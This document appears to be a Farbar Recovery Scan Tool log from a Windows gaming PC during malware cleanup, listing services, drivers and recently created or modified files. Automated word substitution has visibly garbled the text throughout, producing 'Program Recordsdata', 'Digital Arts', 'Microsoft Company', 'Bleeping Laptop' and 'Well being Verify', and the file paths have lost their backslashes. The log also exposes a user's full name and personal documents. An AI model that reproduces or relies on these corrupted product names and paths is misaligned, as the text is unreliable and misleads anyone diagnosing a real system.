S3 Origin Consumer Service; C:Program Recordsdata (x86)OriginOriginClientService.exe [2575624 2022-05-27] (Digital Arts, Inc. -> Digital Arts)
R2 Origin Net Helper Service; C:Program Recordsdata (x86)OriginOriginWebHelperService.exe [3494672 2022-05-27] (Digital Arts, Inc. -> Digital Arts)
S3 OverwolfUpdater; C:Program Recordsdata (x86)Widespread FilesOverwolfOverwolfUpdater.exe [2577240 2022-06-01] (Overwolf Ltd -> Overwolf LTD)
S3 Rockstar Service; D:EpicGamesEpic GamesLauncherRockstarService.exe [2016208 2022-07-03] (Rockstar Video games, Inc. -> Rockstar Video games)
S3 TwitchService; C:Program FilesCommon FilesTwitchTwitchService.exe [337112 2021-10-10] (Twitch Interactive, Inc. -> )
S3 vgc; C:Program FilesRiot Vanguardvgc.exe [10401912 2022-03-11] (Riot Video games, Inc. -> Riot Video games, Inc.)
S3 WdNisSvc; C:ProgramDataMicrosoftWindows DefenderPlatform4.18.2205.7-0NisSrv.exe [3120992 2022-06-22] (Microsoft Home windows Writer -> Microsoft Company)
S3 WinDefend; C:ProgramDataMicrosoftWindows DefenderPlatform4.18.2205.7-0MsMpEng.exe [133544 2022-06-22] (Microsoft Home windows Writer -> Microsoft Company)
R2 WMIRegistrationService; C:WINDOWSSystem32DriverStoreFileRepositorymewmiprov.inf_amd64_cad1db73e8c782a6WMIRegistrationService.exe [538736 2021-07-25] (Intel Company -> Intel Company)
R2 NVDisplay.ContainerLocalSystem; C:WINDOWSSystem32DriverStoreFileRepositorynv_dispi.inf_amd64_c43eff7079c4c90cDisplay.NvContainerNVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramDatapercentNVIDIANVDisplay.ContainerLocalSystem.log -l 3 -d C:WINDOWSSystem32DriverStoreFileRepositorynv_dispi.inf_amd64_c43eff7079c4c90cDisplay.NvContainerpluginsLocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystemLocalSystem
S2 RtkAudioUniversalService; “%SystemRootpercentSystem32RtkAudUService64.exe” [X]

===================== Drivers (Whitelisted) ===================

(If an entry is included within the fixlist, it is going to be faraway from the registry. The file is not going to be moved until listed individually.)

R1 AppleCharger; C:WINDOWSSystem32DRIVERSAppleCharger.sys [22240 2013-10-28] (GIGA-BYTE TECHNOLOGY CO., LTD. -> )
S3 atvi-brynhildr; C:ProgramDataBattle.net_componentsbrynhildr_odin2brynhildr.sys [2188544 2022-06-08] (Activision Publishing Inc -> Activision Blizzard, Inc.)
S3 EQU8_HELPER_19; C:WINDOWSsystem32DRIVERSEQU8_HELPER_19.sys [38032 2021-04-12] (Int3 Software program AB -> )
S3 EQU8_HELPER_39; C:WINDOWSsystem32DRIVERSEQU8_HELPER_39.sys [38032 2022-02-24] (Int3 Software program AB -> )
R1 ESProtectionDriver; C:WINDOWSsystem32driversmbae64.sys [158640 2022-07-06] (Microsoft Home windows {Hardware} Compatibility Writer -> Malwarebytes)
S3 gdrv; C:Windowsgdrv.sys [26792 2020-05-16] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
R3 gdrv2; C:WINDOWSgdrv2.sys [32600 2022-07-10] (GIGA-BYTE Expertise Co., Ltd. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
R3 gdrv3; C:WINDOWSSystem32driversgdrv3.sys [41480 2022-01-11] (GIGA-BYTE Expertise Co., Ltd. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
R3 logi_audio_surround; C:WINDOWSsystem32driverslogi_audio_surround.sys [44488 2021-11-04] (Logitech Inc -> Logitech)
R3 logi_joy_bus_enum; C:WINDOWSsystem32driverslogi_joy_bus_enum.sys [33528 2022-03-22] (WDKTestCert builder,132743893872553407 -> Logitech)
R3 logi_joy_vir_hid; C:WINDOWSsystem32driverslogi_joy_vir_hid.sys [21704 2022-03-22] (WDKTestCert builder,132743893872553407 -> Logitech)
R3 logi_joy_xlcore; C:WINDOWSsystem32driverslogi_joy_xlcore.sys [62904 2022-03-22] (WDKTestCert builder,132743893872553407 -> Logitech)
R2 MBAMChameleon; C:WINDOWSSystem32DriversMbamChameleon.sys [223176 2022-07-09] (Microsoft Home windows {Hardware} Compatibility Writer -> Malwarebytes)
S0 MbamElam; C:WINDOWSSystem32DRIVERSMbamElam.sys [21480 2022-07-06] (Microsoft Home windows Early Launch Anti-malware Writer -> Malwarebytes)
R3 MBAMFarflt; C:WINDOWSSystem32DRIVERSfarflt.sys [192960 2022-07-10] (Microsoft Home windows {Hardware} Compatibility Writer -> Malwarebytes)
R3 MBAMProtection; C:WINDOWSsystem32DRIVERSmbam.sys [74704 2022-07-10] (Microsoft Home windows {Hardware} Compatibility Writer -> Malwarebytes)
R3 MBAMSwissArmy; C:WINDOWSSystem32Driversmbamswissarmy.sys [239544 2022-07-09] (Microsoft Home windows {Hardware} Compatibility Writer -> Malwarebytes)
R3 MBAMWebProtection; C:WINDOWSsystem32DRIVERSmwac.sys [181992 2022-07-10] (Malwarebytes Inc. -> Malwarebytes)
R3 nvvad_WaveExtensible; C:WINDOWSsystem32driversnvvad64v.sys [48552 2021-10-31] (Microsoft Home windows {Hardware} Compatibility Writer -> NVIDIA Company)
U5 PROCMON24; C:WindowsSystem32DriversPROCMON24.sys [95632 2022-07-09] (Microsoft Home windows {Hardware} Compatibility Writer -> Sysinternals – www.sysinternals.com)
R3 rawaccel; C:WINDOWSsystem32driversrawaccel.sys [50176 2021-09-24] (Microsoft Home windows {Hardware} Compatibility Writer -> )
R3 ScpVBus; C:WINDOWSSystem32driversScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
S3 tapprotonvpn; C:WINDOWSSystem32driverstapprotonvpn.sys [44976 2020-01-15] (Microsoft Home windows {Hardware} Compatibility Writer -> The OpenVPN Venture)
S1 UsbCharger; C:WINDOWSSystem32DRIVERSUsbCharger.sys [22240 2013-10-24] (GIGA-BYTE TECHNOLOGY CO., LTD. -> )
R3 VBAudio101WDMCableCMME; C:WINDOWSSystem32driversvbaudio_cablec64_win10.sys [69832 2021-06-27] (Vincent Burel -> Home windows ® Win 7 DDK supplier)
R3 VBAudio102WDMCableDMME; C:WINDOWSSystem32driversvbaudio_cabled64_win10.sys [69616 2021-06-27] (Vincent Burel -> Home windows ® Win 7 DDK supplier)
R3 VBAudioVACAMME; C:WINDOWSSystem32driversvbaudio_cablea64_win7.sys [41144 2015-10-19] (Vincent Burel -> Home windows ® Win 7 DDK supplier)
R3 VBAudioVACBMME; C:WINDOWSSystem32driversvbaudio_cableb64_win7.sys [41144 2015-10-19] (Vincent Burel -> Home windows ® Win 7 DDK supplier)
R3 VBAudioVACMME; C:WINDOWSSystem32driversvbaudio_cable64_win7.sys [41192 2014-09-02] (Vincent Burel -> Home windows ® Win 7 DDK supplier)
R3 VBAudioVMAUXVAIOMME; C:WINDOWSSystem32driversvbaudio_vmauxvaio64_win10.sys [71920 2021-06-27] (Vincent Burel -> Home windows ® Win 7 DDK supplier)
R3 VBAudioVMVAIOMME; C:WINDOWSSystem32driversvbaudio_vmvaio64_win10.sys [71712 2021-06-27] (Vincent Burel -> Home windows ® Win 7 DDK supplier)
R1 vgk; C:Program FilesRiot Vanguardvgk.sys [8508504 2022-03-11] (Riot Video games, Inc. -> Riot Video games, Inc.)
S3 WacHidRouterPro; C:WINDOWSSystem32driverswachidrouter.sys [127512 2020-09-17] (WDKTestCert dant,132134237881206156 -> Wacom Expertise, Corp.)
S3 wacomrouterfilter; C:WINDOWSSystem32driverswacomrouterfilter.sys [28680 2020-09-17] (WDKTestCert dant,132134237881206156 -> Wacom Expertise, Corp.)
S3 WdBoot; C:WINDOWSsystem32driverswdWdBoot.sys [49576 2022-06-22] (Microsoft Home windows Early Launch Anti-malware Writer -> Microsoft Company)
S3 WdFilter; C:WINDOWSsystem32driverswdWdFilter.sys [452856 2022-06-22] (Microsoft Home windows -> Microsoft Company)
S3 WdNisDrv; C:WINDOWSSystem32driverswdWdNisDrv.sys [91384 2022-06-22] (Microsoft Home windows -> Microsoft Company)
S3 AppleLowerFilter; SystemRootSystem32driversAppleLowerFilter.sys [X]
S3 IntcAzAudAddService; SystemRootsystem32driversRTKVHD64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included within the fixlist, it is going to be faraway from the registry. The file is not going to be moved until listed individually.)

==================== One month (created) (Whitelisted) =========

(If an entry is included within the fixlist, the file/folder can be moved.)

2022-07-10 01:15 – 2022-07-10 01:16 – 000031621 _____ C:UsersXoloDownloadsFRST.txt
2022-07-10 01:15 – 2022-07-10 01:15 – 000000000 ____D C:FRST
2022-07-10 01:14 – 2022-07-10 01:14 – 002369024 _____ (Farbar) C:UsersXoloDownloadsFRST64.exe
2022-07-10 00:52 – 2022-07-10 00:52 – 000192960 _____ (Malwarebytes) C:WINDOWSsystem32Driversfarflt.sys
2022-07-10 00:52 – 2022-07-10 00:52 – 000181992 _____ (Malwarebytes) C:WINDOWSsystem32Driversmwac.sys
2022-07-10 00:52 – 2022-07-10 00:52 – 000074704 _____ (Malwarebytes) C:WINDOWSsystem32Driversmbam.sys
2022-07-10 00:52 – 2022-07-10 00:52 – 000032600 _____ (GIGA-BYTE TECHNOLOGY CO., LTD.) C:WINDOWSgdrv2.sys
2022-07-09 23:42 – 2022-07-09 23:42 – 000025645 _____ C:UsersXoloDesktopbookmarks-2022-07-09.json
2022-07-09 23:29 – 2022-07-09 23:29 – 000001005 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsFirefox.lnk
2022-07-09 23:29 – 2022-07-09 23:29 – 000000993 _____ C:UsersPublicDesktopFirefox.lnk
2022-07-09 23:29 – 2022-07-09 23:29 – 000000000 ____D C:WINDOWSsystem32TasksMozilla
2022-07-09 23:29 – 2022-07-09 23:29 – 000000000 ____D C:Program Recordsdata (x86)Mozilla Upkeep Service
2022-07-09 23:08 – 2022-07-09 23:08 – 002260480 _____ C:WINDOWSsystem32TextInputMethodFormatter.dll
2022-07-09 23:08 – 2022-07-09 23:08 – 000693248 _____ C:WINDOWSsystem32FsNVSDeviceSource.dll
2022-07-09 23:08 – 2022-07-09 23:08 – 000640512 _____ C:WINDOWSsystem32SettingSyncDownloadHelper.dll
2022-07-09 23:08 – 2022-07-09 23:08 – 000288768 _____ C:WINDOWSsystem32Windows.Administration.InprocObjects.dll
2022-07-09 23:08 – 2022-07-09 23:08 – 000270848 _____ C:WINDOWSsystem32EsclScan.dll
2022-07-09 23:08 – 2022-07-09 23:08 – 000152064 _____ C:WINDOWSsystem32EsclProtocol.dll
2022-07-09 23:08 – 2022-07-09 23:08 – 000061952 _____ C:WINDOWSsystem32printticketvalidation.dll
2022-07-09 23:08 – 2022-07-09 23:08 – 000057344 _____ C:WINDOWSsystem32APMonUI.dll
2022-07-09 23:08 – 2022-07-09 23:08 – 000033280 _____ (Microsoft Company) C:WINDOWSsystem32mode.com
2022-07-09 23:08 – 2022-07-09 23:08 – 000026624 _____ (Microsoft Company) C:WINDOWSSysWOW64mode.com
2022-07-09 23:08 – 2022-07-09 23:08 – 000024576 _____ C:WINDOWSsystem32WsdProviderUtil.dll
2022-07-09 23:08 – 2022-07-09 23:08 – 000020992 _____ (Microsoft Company) C:WINDOWSsystem32tree.com
2022-07-09 23:08 – 2022-07-09 23:08 – 000018944 _____ C:WINDOWSSysWOW64WsdProviderUtil.dll
2022-07-09 23:08 – 2022-07-09 23:08 – 000017920 _____ (Microsoft Company) C:WINDOWSSysWOW64tree.com
2022-07-09 23:08 – 2022-07-09 23:08 – 000014848 _____ (Microsoft Company) C:WINDOWSsystem32chcp.com
2022-07-09 23:08 – 2022-07-09 23:08 – 000012800 _____ (Microsoft Company) C:WINDOWSSysWOW64chcp.com
2022-07-09 23:08 – 2022-07-09 23:08 – 000011801 _____ C:WINDOWSsystem32DrtmAuthTxt.wim
2022-07-09 23:01 – 2022-07-09 23:01 – 000000000 ___HD C:$WinREAgent
2022-07-09 23:00 – 2022-07-09 23:00 – 000001146 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsPC Well being Verify.lnk
2022-07-09 23:00 – 2022-07-09 23:00 – 000000000 ____D C:Program FilesPCHealthCheck
2022-07-09 22:53 – 2022-07-09 22:53 – 016777216 _____ C:bios.bin
2022-07-09 22:48 – 2022-07-09 23:54 – 000002072 _____ C:UsersXoloDesktopRkill.txt
2022-07-09 22:48 – 2022-07-09 22:49 – 000988112 _____ (Bleeping Laptop, LLC) C:UsersXoloDownloadsrkill64.exe
2022-07-09 22:47 – 2022-07-09 22:47 – 001802704 _____ (Bleeping Laptop, LLC) C:UsersXoloDownloadsrkill.exe
2022-07-09 22:45 – 2022-07-09 23:57 – 000001966 _____ C:UsersPublicDesktopHitmanPro.lnk
2022-07-09 22:45 – 2022-07-09 22:45 – 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsHitmanPro
2022-07-09 22:45 – 2022-07-09 22:45 – 000000000 ____D C:Program FilesHitmanPro
2022-07-09 22:44 – 2022-07-09 22:48 – 000000000 ____D C:ProgramDataHitmanPro
2022-07-09 22:44 – 2022-07-09 22:44 – 014248944 _____ (SurfRight B.V.) C:UsersXoloDownloadsHitmanPro_x64.exe
2022-07-09 22:41 – 2022-07-09 22:41 – 000350392 _____ (Mozilla) C:UsersXoloDownloadsFirefox Installer.exe
2022-07-09 22:29 – 2022-07-09 22:31 – 000000000 ____D C:AdwCleaner
2022-07-09 22:02 – 2022-07-09 22:02 – 003419233 _____ C:UsersXoloDownloadsProcessMonitor.zip
2022-07-09 22:02 – 2022-07-09 22:02 – 000095632 ____H (Sysinternals – www.sysinternals.com) C:WINDOWSsystem32DriversPROCMON24.SYS
2022-07-09 22:02 – 2022-07-09 22:02 – 000000000 ____D C:UsersXoloDownloadsProcessMonitor
2022-07-09 20:21 – 2022-07-09 20:24 – 000329132 _____ C:TDSSKiller.3.1.0.28_09.07.2022_20.21.54_log.txt
2022-07-09 19:42 – 2022-07-09 20:20 – 000647270 _____ C:TDSSKiller.3.1.0.28_09.07.2022_19.42.59_log.txt
2022-07-09 19:42 – 2022-07-09 19:42 – 005054744 _____ (AO Kaspersky Lab) C:UsersXoloDownloadstdsskiller.exe
2022-07-09 19:39 – 2022-07-09 19:39 – 008551608 _____ (Malwarebytes) C:UsersXoloDownloadsadwcleaner.exe
2022-07-09 19:34 – 2022-07-09 19:34 – 000000000 ____D C:Program Recordsdata (x86)Microsoft GameInput
2022-07-09 19:03 – 2022-07-09 19:12 – 000000000 ____D C:WINDOWSsystem32appmgmt
2022-07-09 18:50 – 2022-07-09 18:50 – 000000000 ____D C:WINDOWSsystem32TasksAgent Activation Runtime
2022-07-08 21:06 – 2022-07-08 21:11 – 000000000 ____D C:UsersXoloAppDataLocalGoogle
2022-07-07 23:56 – 2022-07-07 23:56 – 000000000 ____D C:UsersXoloDownloadsTSR-21-pc
2022-07-07 23:53 – 2022-07-07 23:54 – 646076616 _____ C:UsersXoloDownloadsTSR-21-pc.zip
2022-07-06 14:46 – 2022-07-09 22:35 – 000239544 _____ (Malwarebytes) C:WINDOWSsystem32Driversmbamswissarmy.sys
2022-07-06 14:46 – 2022-07-09 22:09 – 000223176 _____ (Malwarebytes) C:WINDOWSsystem32DriversMbamChameleon.sys
2022-07-06 14:46 – 2022-07-06 14:46 – 000002033 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsMalwarebytes.lnk
2022-07-06 14:46 – 2022-07-06 14:46 – 000002021 _____ C:UsersPublicDesktopMalwarebytes.lnk
2022-07-06 14:46 – 2022-07-06 14:46 – 000000000 ____D C:UsersXoloAppDataLocalmbam
2022-07-06 14:46 – 2022-07-06 14:45 – 000158640 _____ (Malwarebytes) C:WINDOWSsystem32Driversmbae64.sys
2022-07-06 14:46 – 2022-07-06 14:45 – 000021480 _____ (Malwarebytes) C:WINDOWSsystem32DriversMbamElam.sys
2022-07-06 14:45 – 2022-07-06 14:45 – 002556344 _____ (Malwarebytes) C:UsersXoloDownloadsMBSetup-B22BE038.exe
2022-07-06 14:45 – 2022-07-06 14:45 – 000000000 ____D C:ProgramDataMalwarebytes
2022-07-06 14:45 – 2022-07-06 14:45 – 000000000 ____D C:Program FilesMalwarebytes
2022-07-06 14:15 – 2022-07-06 14:15 – 000002494 _____ C:UsersXoloDownloads2022 (1).pdf
2022-07-06 06:27 – 2022-07-10 00:51 – 087556096 _____ C:WINDOWSsystem32configSOFTWARE
2022-07-06 06:17 – 2022-07-06 06:27 – 000000000 ____D C:WINDOWSMicrosoft Antimalware
2022-07-04 14:22 – 2022-07-04 14:22 – 000000000 ____D C:UsersXoloAppDataLocalchrome_view
2022-07-04 14:21 – 2022-07-04 14:21 – 000014068 _____ C:WINDOWSsystem32Taskschrome view
2022-07-03 02:32 – 2022-07-03 02:32 – 000131072 _____ (Microsoft Company) C:WINDOWSsystem32gamingtcuihelpers.dll
2022-07-03 02:32 – 2022-07-03 02:32 – 000000028 ____H C:.GamingRoot
2022-07-03 02:32 – 2022-07-03 02:32 – 000000000 ____D C:XboxGames
2022-07-03 02:24 – 2022-07-03 02:24 – 000000221 _____ C:UsersXoloDesktopGrand Theft Auto IV The Full Version.url
2022-06-30 18:36 – 2022-06-30 18:36 – 000000000 ____D C:UsersXolo.ms-ad
2022-06-28 23:03 – 2022-06-28 23:04 – 000000015 _____ C:UsersXoloAppDataRoamingobs-virtualcam.txt
2022-06-28 18:37 – 2022-06-28 18:37 – 000002494 _____ C:UsersXoloDownloads2022.pdf
2022-06-28 15:55 – 2022-07-09 23:29 – 000000000 ____D C:Program FilesMozilla Firefox
2022-06-27 21:28 – 2022-06-27 21:28 – 000000222 _____ C:UsersXoloDesktopPhasmophobia.url
2022-06-26 22:42 – 2022-06-26 22:42 – 000000000 ____D C:UsersXoloAppDataLocalCAPCOM
2022-06-26 17:23 – 2022-06-26 17:23 – 001414600 _____ (Google LLC) C:UsersXoloDownloadsChromeSetup.exe
2022-06-26 16:58 – 2022-07-09 22:09 – 000000214 _____ C:WINDOWSTasksCreateExplorerShellUnelevatedTask.job
2022-06-26 16:57 – 2022-07-09 22:34 – 001137006 _____ C:WINDOWSntbtlog.txt
2022-06-26 16:33 – 2022-06-26 19:55 – 000000000 ____D C:UsersXoloAppDataLocalGUI
2022-06-26 16:29 – 2022-06-26 19:55 – 000000000 ____D C:UsersXoloDownloadsAutoruns
2022-06-26 16:29 – 2022-06-26 16:29 – 003862520 _____ C:UsersXoloDownloadsAutoruns.zip
2022-06-26 15:48 – 2022-06-26 16:37 – 000000000 ____D C:Program FilesGoogle
2022-06-26 13:06 – 2022-06-26 19:55 – 000000000 ____D C:UsersXoloAppDataLocalchrome_cast
2022-06-22 01:32 – 2022-06-08 16:01 – 001905920 _____ C:WINDOWSsystem32vulkaninfo-1-999-0-0-0.exe
2022-06-22 01:32 – 2022-06-08 16:01 – 001905920 _____ C:WINDOWSsystem32vulkaninfo.exe
2022-06-22 01:32 – 2022-06-08 16:01 – 001478400 _____ C:WINDOWSSysWOW64vulkaninfo-1-999-0-0-0.exe
2022-06-22 01:32 – 2022-06-08 16:01 – 001478400 _____ C:WINDOWSSysWOW64vulkaninfo.exe
2022-06-22 01:32 – 2022-06-08 16:01 – 001432320 _____ C:WINDOWSsystem32vulkan-1-999-0-0-0.dll
2022-06-22 01:32 – 2022-06-08 16:01 – 001432320 _____ C:WINDOWSsystem32vulkan-1.dll
2022-06-22 01:32 – 2022-06-08 16:01 – 001145600 _____ C:WINDOWSSysWOW64vulkan-1-999-0-0-0.dll
2022-06-22 01:32 – 2022-06-08 16:01 – 001145600 _____ C:WINDOWSSysWOW64vulkan-1.dll
2022-06-22 01:32 – 2022-06-08 16:00 – 001471104 _____ (Khronos Group) C:WINDOWSsystem32OpenCL.dll
2022-06-22 01:32 – 2022-06-08 16:00 – 001212544 _____ (Khronos Group) C:WINDOWSSysWOW64OpenCL.dll
2022-06-22 01:32 – 2022-06-08 15:57 – 000770688 _____ (NVIDIA Company) C:WINDOWSsystem32nvml.dll
2022-06-22 01:32 – 2022-06-08 15:55 – 005732344 _____ (NVIDIA Company) C:WINDOWSsystem32nvcpl.dll
2022-06-22 01:32 – 2022-06-07 12:13 – 000041992 _____ (NVIDIA Company) C:WINDOWSsystem32Driversnvhdap64.dll
2022-06-22 01:31 – 2022-06-08 15:57 – 000865784 _____ C:WINDOWSsystem32nvofapi64.dll
2022-06-22 01:31 – 2022-06-08 15:57 – 000687608 _____ C:WINDOWSSysWOW64nvofapi.dll
2022-06-22 01:31 – 2022-06-08 15:56 – 002126456 _____ (NVIDIA Company) C:WINDOWSsystem32NvFBC64.dll
2022-06-22 01:31 – 2022-06-08 15:56 – 001607144 _____ (NVIDIA Company) C:WINDOWSSysWOW64NvFBC.dll
2022-06-22 01:31 – 2022-06-08 15:56 – 001535480 _____ (NVIDIA Company) C:WINDOWSsystem32NvIFR64.dll
2022-06-22 01:31 – 2022-06-08 15:56 – 001182200 _____ (NVIDIA Company) C:WINDOWSSysWOW64NvIFR.dll
2022-06-22 01:31 – 2022-06-08 15:56 – 001058416 _____ (NVIDIA Company) C:WINDOWSsystem32nvEncodeAPI64.dll
2022-06-22 01:31 – 2022-06-08 15:56 – 000844400 _____ (NVIDIA Company) C:WINDOWSSysWOW64nvEncodeAPI.dll
2022-06-22 01:31 – 2022-06-08 15:56 – 000714728 _____ (NVIDIA Company) C:WINDOWSsystem32nvidia-smi.exe
2022-06-22 01:31 – 2022-06-08 15:55 – 010268792 _____ (NVIDIA Company) C:WINDOWSSysWOW64nvcuvid.dll
2022-06-22 01:31 – 2022-06-08 15:55 – 008803304 _____ (NVIDIA Company) C:WINDOWSsystem32nvcuvid.dll
2022-06-22 01:31 – 2022-06-08 15:55 – 005362680 _____ (NVIDIA Company) C:WINDOWSSysWOW64nvcuda.dll
2022-06-22 01:31 – 2022-06-08 15:55 – 000455288 _____ (NVIDIA Company) C:WINDOWSsystem32nvdebugdump.exe
2022-06-22 01:31 – 2022-06-08 15:54 – 000852072 _____ (NVIDIA Company) C:WINDOWSsystem32MCU.exe
2022-06-22 01:31 – 2022-06-06 23:08 – 000093121 _____ C:WINDOWSsystem32nvinfo.pb
2022-06-21 19:37 – 2022-06-21 19:37 – 000176381 _____ C:UsersXoloDocumentsScan0002.pdf
2022-06-21 16:55 – 2022-06-21 16:55 – 001493136 _____ C:UsersXoloDocumentsLease Settlement.pdf
2022-06-21 16:34 – 2022-06-21 16:34 – 000545718 _____ C:UsersXoloDocumentsLouisiana_Residential_Lease_Agreement- DeAnthieus.pdf
2022-06-18 15:43 – 2022-06-18 15:43 – 000082004 _____ C:UsersXoloDocumentsDeAnthieus-Clayton-Morse.Resume.pdf
2022-06-16 15:25 – 2022-06-16 15:25 – 000000000 ____D C:UsersXoloAppDataRoamingMicrosoftWindowsStart MenuProgramsZoom
2022-06-16 15:25 – 2022-06-16 15:25 – 000000000 ____D C:UsersXoloAppDataLocalZoom
2022-06-16 14:43 – 2022-06-16 14:43 – 001333760 _____ C:WINDOWSSysWOW64TextInputMethodFormatter.dll
2022-06-16 14:43 – 2022-06-16 14:43 – 000232288 _____ C:WINDOWSsystem32containerdevicemanagement.dll
2022-06-16 14:43 – 2022-06-16 14:43 – 000104448 _____ C:WINDOWSsystem32nettraceex.dll

==================== One month (modified) ==================

(If an entry is included within the fixlist, the file/folder can be moved.)

2022-07-10 01:12 – 2020-03-07 19:21 – 000000000 ____D C:UsersXoloAppDataLocalBattle.internet
2022-07-10 01:10 – 2021-07-10 22:03 – 000000000 ____D C:UsersXoloAppDataLocalOrigin
2022-07-10 01:07 – 2021-12-22 20:00 – 000000000 ____D C:Program Recordsdata (x86)New folder
2022-07-10 01:06 – 2020-03-07 07:54 – 000000000 ____D C:Program Recordsdata (x86)Steam
2022-07-10 00:58 – 2020-12-12 04:19 – 000840598 _____ C:WINDOWSsystem32PerfStringBackup.INI
2022-07-10 00:58 – 2019-12-07 04:13 – 000000000 ____D C:WINDOWSINF
2022-07-10 00:54 – 2020-04-18 21:05 – 000000001 _____ C:WINDOWSvgkbootstatus.dat
2022-07-10 00:53 – 2022-02-09 04:22 – 000000000 ____D C:ProgramDataMozilla-1de4eec8-1241-4177-a864-e594e8d1fb38
2022-07-10 00:53 – 2020-03-07 07:53 – 000000000 ____D C:ProgramDataOrigin
2022-07-10 00:52 – 2022-03-03 21:19 – 000003140 _____ C:WINDOWSsystem32TasksMSIAfterburner
2022-07-10 00:52 – 2021-07-31 23:22 – 000000000 ____D C:UsersXoloAppDataLocalLowMozilla
2022-07-10 00:52 – 2021-01-24 02:03 – 000002319 _____ C:UsersXoloDesktopOutplayed.lnk
2022-07-10 00:52 – 2021-01-24 02:02 – 000000000 ____D C:UsersXoloAppDataLocalOverwolf
2022-07-10 00:52 – 2021-01-16 03:35 – 000000000 ____D C:UsersXoloAppDataRoamingWTablet
2022-07-10 00:52 – 2020-03-07 07:52 – 000000000 ____D C:UsersXoloAppDataRoamingTelegram Desktop
2022-07-10 00:52 – 2020-03-07 07:29 – 000000000 ____D C:UsersXoloAppDataRoamingLGHUB
2022-07-10 00:52 – 2020-03-07 07:29 – 000000000 ____D C:UsersXoloAppDataLocalLGHUB
2022-07-10 00:52 – 2020-03-07 06:24 – 000000000 ____D C:ProgramDataNVIDIA
2022-07-10 00:51 – 2021-06-27 00:14 – 000037995 _____ C:UsersXoloAppDataRoamingVoiceMeeterBananaDefault.xml
2022-07-10 00:51 – 2020-12-12 04:14 – 000000006 ____H C:WINDOWSTasksSA.DAT
2022-07-10 00:51 – 2020-12-12 04:10 – 000008192 ___SH C:DumpStack.log.tmp
2022-07-10 00:51 – 2020-03-07 07:49 – 000000000 ____D C:UsersXoloAppDataRoamingdiscord
2022-07-10 00:51 – 2019-12-07 04:14 – 000000000 ____D C:ProgramDataregid.1991-06.com.microsoft
2022-07-10 00:51 – 2019-12-07 04:03 – 000524288 _____ C:WINDOWSsystem32configBBI
2022-07-10 00:01 – 2021-01-18 02:27 – 000000000 ____D C:UsersXoloAppDataLocalDiscord
2022-07-09 23:24 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSAppReadiness
2022-07-09 23:23 – 2020-12-12 04:10 – 000267648 _____ C:WINDOWSsystem32FNTCACHE.DAT
2022-07-09 23:23 – 2019-12-07 04:14 – 000000000 ___RD C:WINDOWSPrintDialog
2022-07-09 23:23 – 2019-12-07 04:14 – 000000000 ___RD C:WINDOWSImmersiveControlPanel
2022-07-09 23:23 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSSysWOW64WinMetadata
2022-07-09 23:23 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSSystemResources
2022-07-09 23:23 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSsystem32WinMetadata
2022-07-09 23:23 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSsystem32oobe
2022-07-09 23:23 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSsystem32es-MX
2022-07-09 23:23 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSsystem32DDFs
2022-07-09 23:23 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSShellExperiences
2022-07-09 23:23 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSShellComponents
2022-07-09 23:23 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSbcastdvr
2022-07-09 23:11 – 2019-12-07 04:03 – 000000000 ____D C:WINDOWSCbsTemp
2022-07-09 23:08 – 2020-12-12 04:11 – 003010048 _____ (Microsoft Company) C:WINDOWSSysWOW64PrintConfig.dll
2022-07-09 22:54 – 2021-10-09 01:16 – 000001162 _____ C:WINDOWSsystem32configVSMIDK
2022-07-09 21:03 – 2020-03-07 21:29 – 000000000 ___RD C:UsersXoloOneDrive
2022-07-09 21:02 – 2020-12-12 04:11 – 000000000 ____D C:UsersXolo
2022-07-09 20:45 – 2020-03-08 01:07 – 000000000 ____D C:UsersXoloAppDataLocalCrashDumps
2022-07-09 20:38 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSLiveKernelReports
2022-07-09 20:23 – 2020-03-07 21:44 – 000000000 ____D C:ProgramDataPackages
2022-07-09 20:23 – 2020-03-07 21:27 – 000000000 ____D C:UsersXoloAppDataLocalPackages
2022-07-09 20:23 – 2020-03-07 07:57 – 000000000 ____D C:UsersXoloAppDataLocalPlaceholderTileLogoFolder
2022-07-09 20:23 – 2019-12-07 04:14 – 000000000 ___HD C:Program FilesWindowsApps
2022-07-09 19:53 – 2021-04-05 01:11 – 000000000 ____D C:Program Recordsdata (x86)Extract-XISO
2022-07-09 19:17 – 2021-05-20 00:09 – 000000000 ____D C:Program FilesBlackmagic Design
2022-07-09 19:17 – 2021-05-20 00:08 – 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsBlackmagic Design
2022-07-09 18:27 – 2020-12-12 04:10 – 000000000 ____D C:WINDOWSsystem32SleepStudy
2022-07-08 22:28 – 2021-12-10 22:06 – 000003592 _____ C:WINDOWSsystem32TasksOneDrive Reporting Job-S-1-5-21-3474202653-3316422791-2388774026-1001
2022-07-08 22:28 – 2020-12-12 04:14 – 000003378 _____ C:WINDOWSsystem32TasksOneDrive Standalone Replace Job-S-1-5-21-3474202653-3316422791-2388774026-1001
2022-07-08 22:28 – 2020-12-12 04:11 – 000002380 _____ C:UsersXoloAppDataRoamingMicrosoftWindowsStart MenuProgramsOneDrive.lnk
2022-07-08 19:14 – 2020-03-07 07:43 – 000000000 ____D C:UsersXoloAppDataLocalNVIDIA
2022-07-08 04:09 – 2020-03-14 02:21 – 000000000 ____D C:UsersXoloDownloadsTelegram Desktop
2022-07-07 21:51 – 2019-03-18 23:52 – 000000000 ___HD C:WINDOWSsystem32GroupPolicy
